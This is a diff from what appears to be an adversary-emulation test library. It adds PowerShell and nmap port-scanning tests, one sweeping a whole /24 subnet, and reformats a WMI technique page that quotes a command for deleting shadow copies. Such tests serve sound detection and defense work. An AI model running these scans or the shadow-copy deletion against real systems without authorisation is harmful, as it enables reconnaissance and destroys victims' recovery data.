+          $ports = #{port_list}
+  
+          foreach ($ip in $ip_list) {
+              foreach ($port in $ports) {
+                  Write-Host "[i] Establishing connection to: $ip : $port"
+                  try {
+                      $tcp = New-Object Net.Sockets.TcpClient
+                      $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                  } catch {}
+                  if ($tcp.Connected) {
+                      $tcp.Close()
+                      Write-Host "Port $port is open on $ip"
+                  }
+              }
           }
+      } elseif ($ipAddr -notlike "*,*") {
+          if ($ipAddr -eq "") {
+              # Assumes the "primary" interface is shown at the top
+              $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+              Write-Host "[i] Using Interface $interface"
+              $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+          }
+          Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+          $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+          # Always assumes /24 subnet
+          Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+  
+          $ports = #{port_list}
+          $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+  
+          foreach ($ip in $subnetIPs) {
+              foreach ($port in $ports) {
+                  try {
+                      $tcp = New-Object Net.Sockets.TcpClient
+                      $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+                  } catch {}
+                  if ($tcp.Connected) {
+                      $tcp.Close()
+                      Write-Host "Port $port is open on $ip"
+                  }
+              }
+          }
+      } else {
+          Write-Host "[Error] Invalid Inputs"
+          exit 1
       }
     name: powershell
 - name: Remote Desktop Services Discovery via PowerShell 
@@ -256,3 +277,32 @@ atomic_tests:
        Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
     name: powershell
     elevation_required: true
+- name: Port Scan using nmap (Port range)
+  auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+  description: |
+    Scan multiple ports to check for listening ports with nmap
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    host:
+      description: Host(s) to scan.
+      type: string
+      default: "127.0.0.1"
+    port_range:
+      description: Port range(s) to scan.
+      type: string
+      default: "0-65535"
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Check if nmap command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
+  executor:
+    command: |
+      nmap -Pn -sV -p #{port_range} #{host}
+    elevation_required: true
+    name: sh

atomics/T1047/T1047.md

@@ -1,12 +1,16 @@
 # T1047 - Windows Management Instrumentation
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1047)
-<blockquote>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
+<blockquote>
+
+Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
 
 The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
 
 An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
 
-**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)</blockquote>
+**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
+
+</blockquote>
 
 ## Atomic Tests